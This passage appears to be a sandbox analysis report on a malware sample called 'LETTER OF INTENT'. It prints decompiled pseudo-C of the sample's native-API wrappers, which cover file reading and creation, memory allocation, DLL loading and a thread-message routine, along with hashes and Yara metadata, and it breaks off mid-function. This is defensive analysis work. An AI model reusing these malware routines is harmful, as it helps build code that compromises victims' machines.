15870->15871 15872 413e40 LdrLoadDll 15871->15872 15877 405fdc 15871->15877 15873 405f58 15872->15873 15874 409d50 LdrLoadDll 15873->15874 15875 405fb7 15874->15875 15876 413e40 LdrLoadDll 15875->15876 15876->15877 15877->15798 15879 41a260 2 API calls 15878->15879 15880 417b07 15879->15880 15906 408160 15880->15906 15882 417b22 15883 417b60 15882->15883 15884 417b49 15882->15884 15886 41a010 2 API calls 15883->15886 15885 41a090 2 API calls 15884->15885 15887 417b56 15885->15887 15888 417b9a 15886->15888 15887->15826 15889 41a010 2 API calls 15888->15889 15890 417bb3 15889->15890 15896 417e54 15890->15896 15912 41a050 15890->15912 15893 417e40 15894 41a090 2 API calls 15893->15894 15895 417e4a 15894->15895 15895->15826 15897 41a090 2 API calls 15896->15897 15898 417ea9 15897->15898 15898->15826 15900 40721f 15899->15900 15901 407135 15899->15901 15900->15828 15901->15900 15902 413a40 6 API calls 15901->15902 15903 4071a2 15902->15903 15904 41a090 2 API calls 15903->15904 15905 4071c9 15903->15905 15904->15905 15905->15828 15907 408185 15906->15907 15908 409b30 LdrLoadDll 15907->15908 15909 4081b8 15908->15909 15911 4081dd 15909->15911 15915 40b330 15909->15915 15911->15882 15932 4187f0 15912->15932 15916 40b35c 15915->15916 15917 418450 LdrLoadDll 15916->15917 15918 40b375 15917->15918 15919 40b37c 15918->15919 15926 418490 15918->15926 15919->15911 15923 40b3b7 15924 418700 2 API calls 15923->15924 15925 40b3da 15924->15925 15925->15911 15927 4191d0 LdrLoadDll 15926->15927 15928 40b39f 15926->15928 15927->15928 15928->15919 15929 418a80 15928->15929 15930 418a9f 15929->15930 15931 4191d0 LdrLoadDll 15929->15931 15930->15923 15931->15930 15933 4191d0 LdrLoadDll 15932->15933 15934 417e39 15933->15934 15934->15893 15934->15896 15936 4191d0 LdrLoadDll 15935->15936 15937 40d384 15936->15937 15937->15842 15938 418060 15937->15938 15939 4191d0 LdrLoadDll 15938->15939 15940 40d395 15939->15940 15940->15839 15940->15841 15942 407298 15941->15942 15943 409b30 LdrLoadDll 15942->15943 15944 4072b3 15943->15944 15945 413e40 LdrLoadDll 15944->15945 15946 4072c3 15945->15946 15947 4072cc PostThreadMessageW 15946->15947 15948 4072e0 15946->15948 15947->15948 15948->15855 15950 40d3d3 15949->15950 15953 418100 15950->15953 15954 4191d0 LdrLoadDll 15953->15954 15955 40d3fe 15954->15955 15955->15855 15957 40d2b1 15956->15957 15960 40d2f1 15957->15960 15965 418950 15957->15965 15959 40d2f8 15959->15816 15960->15959 15961 418170 LdrLoadDll 15960->15961 15962 40d30f 15961->15962 15962->15959 15963 418770 LdrLoadDll 15962->15963 15964 40d32e 15963->15964 15964->15816 15966 4191d0 LdrLoadDll 15965->15966 15967 41896f 15966->15967 15967->15960

              Executed Functions

              Function 0041867A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 41867a-4186c9 call 4191d0 NtReadFile
              C-Code - Quality: 23%
              			E0041867A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t21;
				void* _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				asm("enter 0x8b55, 0xec");
				_t16 = _a4;
				_t32 = _a4 + 0xc48;
				E004191D0(_t30, _t16, _t32,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t6 =  &_a40; // 0x413a21
				_t8 =  &_a32; // 0x413d62
				_t14 =  &_a8; // 0x413d62
				_t21 =  *((intOrPtr*)( *_t32))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36,  *_t6, _t31, _t34); // executed
				return _t21;
			}








              0x0041867f
              0x00418683
              0x0041868f
              0x00418697
              0x0041869c
              0x004186a2
              0x004186bd
              0x004186c5
              0x004186c9

              APIs
              • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: !:A$b=A$b=A
              • API String ID: 2738559852-704622139
              • Opcode ID: e74eab5d3dc584caaafd48ca711e429412a1b28a656d261d904f5a869ae2d219
              • Instruction ID: eaf90a57241168485d11756f66813e809b899221acb9c2be6fe4b713bc006db1
              • Opcode Fuzzy Hash: e74eab5d3dc584caaafd48ca711e429412a1b28a656d261d904f5a869ae2d219
              • Instruction Fuzzy Hash: 6CF0F9B2200109AFDB04CF89CC84EEB77ADAF8C354F058249FE0D97251C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00418680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 3 418680-418696 4 41869c-4186c9 NtReadFile 3->4 5 418697 call 4191d0 3->5 5->4
              C-Code - Quality: 37%
              			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






              0x00418683
              0x0041868f
              0x00418697
              0x0041869c
              0x004186a2
              0x004186bd
              0x004186c5
              0x004186c9

              APIs
              • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: !:A$b=A$b=A
              • API String ID: 2738559852-704622139
              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
              • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
              • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00409B30 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 361 409b30-409b4c 362 409b54-409b59 361->362 363 409b4f call 41af60 361->363 364 409b5b-409b5e 362->364 365 409b5f-409b6d call 41b380 362->365 363->362 368 409b7d-409b8e call 419710 365->368 369 409b6f-409b7a call 41b600 365->369 374 409b90-409ba4 LdrLoadDll 368->374 375 409ba7-409baa 368->375 369->368 374->375
              C-Code - Quality: 100%
              			E00409B30(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













              0x00409b4c
              0x00409b4f
              0x00409b54
              0x00409b59
              0x00409b63
              0x00409b68
              0x00409b6b
              0x00409b6d
              0x00409b75
              0x00409b7a
              0x00409b7a
              0x00409b81
              0x00409b89
              0x00409b8c
              0x00409b8e
              0x00409ba2
              0x00000000
              0x00409ba4
              0x00409baa
              0x00409b5e
              0x00409b5e
              0x00409b5e

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
              • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
              • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004185CF Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 376 4185cf-418621 call 4191d0 NtCreateFile
              C-Code - Quality: 100%
              			E004185CF(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v117;
				long _t22;
				void* _t34;

				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E004191D0(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






              0x004185d3
              0x004185df
              0x004185e7
              0x0041861d
              0x00418621

              APIs
              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: c744c7afc01e9d282276df09f92af41eb3f4d62b08c3e966ab54f4516f3022aa
              • Instruction ID: a45b50256b54a778fad488d293ba22f2c53eea2bca465b982bc36a4e90f66ff1
              • Opcode Fuzzy Hash: c744c7afc01e9d282276df09f92af41eb3f4d62b08c3e966ab54f4516f3022aa
              • Instruction Fuzzy Hash: 3F01CFB2200108BFCB18CF99DC95EEB77A9AF8C354F158248FA1DE7241C630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004185D0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 379 4185d0-4185e6 380 4185ec-418621 NtCreateFile 379->380 381 4185e7 call 4191d0 379->381 381->380
              C-Code - Quality: 100%
              			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





              0x004185df
              0x004185e7
              0x0041861d
              0x00418621

              APIs
              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
              • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
              • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004187AA Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 382 4187aa-4187ed call 4191d0 NtAllocateVirtualMemory
              C-Code - Quality: 53%
              			E004187AA(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				asm("outsb");
				asm("hlt");
				asm("sbb ebx, [ebx-0x1374aad3]");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





              0x004187aa
              0x004187ab
              0x004187ad
              0x004187b3
              0x004187bf
              0x004187c7
              0x004187e9
              0x004187ed

              APIs
              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: ead0d1e4599c5376d0912e5e0e9384674333392f2b832a1716443487fbbc2499
              • Instruction ID: ebe5a3f519b2ba9f6db6c4faa06b87820768575a996a18753066eda75f6d58d4
              • Opcode Fuzzy Hash: ead0d1e4599c5376d0912e5e0e9384674333392f2b832a1716443487fbbc2499
              • Instruction Fuzzy Hash: 4FF0F2B6200209ABDB18DF99CC84EEB77A9FF88354F158659FE1897241C634E811CBB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004187B0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





              0x004187bf
              0x004187c7
              0x004187e9
              0x004187ed

              APIs
              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
              • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
              • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00418700 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E00418700(void* __esi, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8);
				asm("rcr byte [esi+0x5d], 1");
				return _t8;
			}





              0x00418703
              0x00418706
              0x0041870f
              0x00418717
              0x00418725
              0x00418726
              0x00418729

              APIs
              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
              • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
              • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004088C0 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E004088C0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				signed int _t31;
				signed int _t33;
				void* _t34;
				signed int _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						E0041A750( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_push( &_v284);
							_push(E00413D80(_t52, _t50));
							_t31 = E00413DE0(__eflags);
							_t56 = _t56 + 0x10;
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							__eflags = _t50 - 0x62;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							L8:
							_t33 = E00407060( &_v24,  &_v840);
							_t55 = _t56 + 8;
							__eflags = _t33;
							if(_t33 != 0) {
								goto L9;
							}
							goto L10;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						_t10 = _t52 + 0x474;
						 *_t10 =  *(_t52 + 0x474) ^  *_t9;
						__eflags =  *_t10;
						_t39 = 1;
						goto L8;
						L9:
						__eflags = _t39;
					} while (_t39 == 0);
					L10:
					_t34 = E004070E0(_t52,  &_v24); // executed
					__eflags = _t39;
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						_t16 = _t52 + 0x55c;
						 *_t16 =  *(_t52 + 0x55c) + 0xffffffba;
						__eflags =  *_t16;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					_t21 = _t52 + 0x32;
					 *_t21 =  *(_t52 + 0x32) +  *_t20 + 1;
					__eflags =  *_t21;
					return 1;
				} else {
					return _t24;
				}
			}



















              0x004088cb
              0x004088d3
              0x004088d5
              0x004088da
              0x004088df
              0x004088f2
              0x004088f7
              0x00408900
              0x0040890c
              0x0040891f
              0x00408924
              0x00408927
              0x00408930
              0x00408936
              0x00408941
              0x00408942
              0x00408947
              0x0040894a
              0x0040894c
              0x00000000
              0x00000000
              0x0040894e
              0x0040894f
              0x00408952
              0x00000000
              0x00000000
              0x00408954
              0x00408961
              0x0040896c
              0x00408971
              0x00408974
              0x00408976
              0x00000000
              0x00000000
              0x00000000
              0x00408976
              0x00408956
              0x00408959
              0x00408959
              0x00408959
              0x0040895f
              0x00000000
              0x00408978
              0x00408978
              0x00408978
              0x0040897c
              0x00408981
              0x0040898a
              0x0040898c
              0x0040898e
              0x00408994
              0x00408998
              0x0040899b
              0x0040899b
              0x0040899b
              0x0040899b
              0x004089a2
              0x004089a5
              0x004089aa
              0x004089aa
              0x004089aa
              0x004089b7
              0x004088e6
              0x004088e6
              0x004088e6

              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
              • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
              • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
              • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00418866 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 36 418866-418868 37 41886a-41889d call 4191d0 36->37 38 4188bc-4188d1 RtlAllocateHeap 36->38
              C-Code - Quality: 29%
              			E00418866(void* __ebx, void* __ecx, void* __esi, void* __eflags, intOrPtr _a3, intOrPtr _a7, intOrPtr _a11, char _a12, long _a16, long _a20) {
				void* _t11;
				void* _t25;
				void* _t28;
				intOrPtr* _t29;
				void* _t32;

				_push(es);
				if(__eflags >= 0) {
					_t9 =  &_a12; // 0x413526
					_t11 = RtlAllocateHeap( *_t9, _a16, _a20); // executed
					return _t11;
				} else {
					_t28 = __esi + 1;
					asm("sti");
					_pop(_t32);
					_t12 = _a3;
					_t4 = _t12 + 0xc6c; // 0xc6e
					_t29 = _t4;
					E004191D0(_t25, _a3, _t29,  *((intOrPtr*)(_a3 + 0x10)), 0, 0x33);
					return  *((intOrPtr*)( *_t29))(_a7, _a11, _t28, _t32);
				}
			}








              0x00418866
              0x00418868
              0x004188c2
              0x004188cd
              0x004188d1
              0x0041886a
              0x0041886a
              0x0041886b
              0x0041886c
              0x00418873
              0x0041887f
              0x0041887f
              0x00418887
              0x0041889d
              0x0041889d

              APIs
              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: &5A
              • API String ID: 1279760036-1617645808
              • Opcode ID: 7d936363d04286f5f6077421a1080e55620e0d6ac9595c73a4e85d548d68526f
              • Instruction ID: da40474d02a9ce316bf4caa09ebbeee7a342e9cd35912896d4acfedce4566e88
              • Opcode Fuzzy Hash: 7d936363d04286f5f6077421a1080e55620e0d6ac9595c73a4e85d548d68526f
              • Instruction Fuzzy Hash: 33F09AB5200214ABDB18EF68DC84EEB73A9EF88354F148489FC884B242C531EA10CBF0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004188A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 42 4188a0-4188b6 43 4188bc-4188d1 RtlAllocateHeap 42->43 44 4188b7 call 4191d0 42->44 44->43
              C-Code - Quality: 100%
              			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





              0x004188b7
              0x004188c2
              0x004188cd
              0x004188d1

              APIs
              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: &5A
              • API String ID: 1279760036-1617645808
              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
              • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
              • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407307 Relevance: 1.7, APIs: 1, Instructions: 186threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 279 407307-40730b 280 40730d 279->280 281 40735f-407368 279->281 282 4072b0-4072bd 280->282 283 40730f-40735a call 41a130 call 407280 call 4199c0 280->283 284 407370-4073a2 call 40d3c0 call 418770 281->284 286 4072c3-4072ca 282->286 287 4072be call 413e40 282->287 283->281 300 4073a4-4073ac 284->300 301 4073d7-4073df 284->301 290 4072cc-4072de PostThreadMessageW 286->290 291 4072fe-407302 286->291 287->286 294 4072e0-4072fa call 409290 290->294 295 4072fd 290->295 294->295 295->291 304 4073c6-4073d0 300->304 305 4073ae-4073b5 300->305 304->284 308 4073d2-4073d5 304->308 305->304 307 4073b7-4073be 305->307 307->304 309 4073c0-4073c4 307->309 310 4073fd-40740f call 418700 308->310 309->304 311 4073e0-4073fa call 41a0b0 309->311 310->301 315 407411-40747c call 417f80 310->315 311->310 315->301 319 407482-4074de call 417fc0 315->319 319->301 322 4074e4-407531 call 419660 call 419680 call 41a3a0 call 41a0b0 call 413a40 319->322
              C-Code - Quality: 67%
              			E00407307(intOrPtr* __eax, void* __ecx, void* __fp0, intOrPtr _a4, long _a12, intOrPtr _a16, int _a20) {
				signed char _v4;
				signed char _v8;
				char _v117;
				signed char _v128;
				signed char _v132;
				char _v652;
				signed char _v664;
				char _v684;
				signed char _v688;
				void* __ebx;
				intOrPtr __edi;
				intOrPtr __esi;
				signed char _t67;
				int _t70;
				signed char _t76;
				intOrPtr* _t77;
				signed char _t79;
				void* _t86;
				int _t89;
				signed int _t91;
				void* _t92;
				signed char _t94;
				intOrPtr* _t95;
				signed int* _t105;
				signed char _t110;
				intOrPtr _t115;
				long _t118;
				void* _t120;
				int _t125;
				void* _t127;
				void* _t131;

				asm("sbb al, 0xf7");
				if(__ecx >=  *__eax) {
					L10:
					_a20 = 0;
					while(1) {
						E0040D3C0(_t115, 0xfe363c80); // executed
						_t67 = E00418770(_t115,  *((intOrPtr*)(_t120 + 0x2f4)), _t92,  &_v684, 0x2a8, 0); // executed
						_t131 = _t131 + 0x20;
						 *(_t120 + 0x2dc) = _t67;
						__eflags = _t67;
						if(_t67 < 0) {
							break;
						}
						__eflags = _v652;
						if(_v652 == 0) {
							L16:
							_t70 = _a20 + 1;
							_a20 = _t70;
							__eflags = _t70 - 2;
							if(_t70 < 2) {
								continue;
							} else {
								_t94 = _v4;
								goto L20;
							}
						} else {
							__eflags = _v664;
							if(_v664 == 0) {
								goto L16;
							} else {
								__eflags = _v132;
								if(_v132 == 0) {
									goto L16;
								} else {
									__eflags = _v128;
									if(_v128 != 0) {
										_t94 = 1;
